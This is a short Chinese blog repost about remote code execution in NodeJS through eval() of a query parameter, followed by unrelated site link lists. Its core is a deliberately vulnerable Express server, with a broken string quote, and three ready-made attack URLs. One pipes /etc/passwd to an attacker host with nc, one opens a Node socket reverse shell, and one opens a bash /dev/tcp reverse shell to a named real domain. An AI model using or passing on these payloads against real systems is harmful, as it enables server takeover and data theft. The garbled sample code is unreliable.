首页
所有分类
TAGS
文字工具 EMOJI BIBLE
服务器 NodeJs

NodeJS远程代码执行

Posted in NodeJs onAugust 28, 2016

背景

@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。

测试

var express = require('express'); 
var app = express(); 
app.get('/', function (req, res) { 
  res.send('Hello eval(req.query.q));
  console.log(req.query.q);
});
app.listen(8080, function () { 
  console.log('Example listening on port 8080!');
});

任意文件读取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

NodeJS远程代码执行

- Author -

hebedich

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

NodeJs 相关文章推荐
Nodejs使用mysql模块之获得更新和删除影响的行数的方法
Mar 18 NodeJs
nodejs之请求路由概述
Jul 05 NodeJs
nodejs实现的一个简单聊天室功能分享
Dec 06 NodeJs
nodejs中的fiber(纤程)库详解
Mar 24 NodeJs
nodejs实现遍历文件夹并统计文件大小
May 28 NodeJs
详解nodejs微信公众号开发——2.自动回复
Apr 10 NodeJs
使用nodeJs来安装less及编译less文件为css文件的方法
Nov 20 NodeJs
nodejs实现超简单生成二维码的方法
Mar 17 NodeJs
Nodejs实现多文件夹文件同步
Oct 17 NodeJs
nodejs 使用http进行post或get请求的实例(携带cookie)
Jan 03 NodeJs
NodeJS模块与ES6模块系统语法及注意点详解
Jan 04 NodeJs
nodejs搭建本地服务器并访问文件操作示例
May 11 NodeJs
用NodeJS实现批量查询地理位置的经纬度接口
Aug 16 #NodeJs
使用nodejs中httpProxy代理时候出现404异常的解决方法
Aug 15 #NodeJs
NodeJs的优势和适合开发的程序
Aug 14 #NodeJs
在windows上用nodejs搭建静态文件服务器的简单方法
Aug 11 #NodeJs
Nodejs抓取html页面内容(推荐)
Aug 11 #NodeJs
用nodejs的实现原理和搭建服务器(动态)
Aug 10 #NodeJs
nodejs如何获取时间戳与时间差
Aug 03 #NodeJs
计算器(5) 底部导航(1) FutureTask(3) CompletableFuture(1) JAVA(88) 异步回调(1) 对齐打印(1) format(1) Springboot-cli(1) ForkJoin(1)
You might like
BBS(php & mysql)完整版(一)
2006/10/09 PHP
php通过COM类调用组件的实现代码
2012/01/11 PHP
PHP获取当前所在目录位置的方法
2014/11/26 PHP
php版微信支付api.mch.weixin.qq.com域名解析慢原因与解决方法
2016/10/12 PHP
js操作ajax返回的json的注意问题!
2010/02/23 Javascript
关于IE浏览器以及Firefox下的javascript冒泡事件的响应层级
2010/10/14 Javascript
javascript 日期时间 转换的方法
2013/02/21 Javascript
jquery中插件实现自动添加用户的具体代码
2013/11/15 Javascript
点击显示指定元素隐藏其他同辈元素的方法
2014/02/19 Javascript
JavaScript中对象property的删除方法介绍
2014/12/30 Javascript
JavaScript判断浏览器类型的方法
2015/02/10 Javascript
JavaScript实现简单的二级导航菜单实例
2015/04/15 Javascript
JavaScript实现控制打开文件另存为对话框的方法
2015/04/17 Javascript
JQuery鼠标移到小图显示大图效果的方法
2015/06/10 Javascript
jQuery插件fullPage.js实现全屏滚动效果
2016/12/02 Javascript
react性能优化达到最大化的方法 immutable.js使用的必要性
2017/03/09 Javascript
基于JavaScript中字符串的match与replace方法(详解)
2017/12/04 Javascript
axios 处理 302 状态码的解决方法
2018/04/10 Javascript
vue v-for出来的列表,点击某个li使得当前被点击的li字体变红操作
2020/07/17 Javascript
详解Python中的type()方法的使用
2015/05/21 Python
Python探索之爬取电商售卖信息代码示例
2017/10/27 Python
python实现求最长回文子串长度
2018/01/22 Python
Python获取对象属性的几种方式小结
2020/03/12 Python
基于python生成英文版词云图代码实例
2020/05/16 Python
Python类型转换的魔术方法详解
2020/12/23 Python
python向xls写入数据(包括合并,边框,对齐,列宽)
2021/02/02 Python
aec加密 php_php aes加密解密类(兼容php5、php7)
2021/03/14 PHP
HTML5 本地存储和内容按需加载的思路和方法
2011/04/07 HTML / CSS
大学军训感言800字
2014/02/27 职场文书
大学新生军训自我鉴定
2014/09/18 职场文书
第二批党的群众路线教育实践活动个人对照检查材料
2014/09/23 职场文书
工厂见习报告范文
2014/10/31 职场文书
为什么node.js不适合大型项目
2021/04/28 Javascript
MySQL中你可能忽略的COLLATION实例详解
2021/05/12 MySQL
Linux系统下MySQL配置主从分离的步骤
2022/03/21 MySQL
使用Postman测试需要授权的接口问题
2022/06/21 Java/Android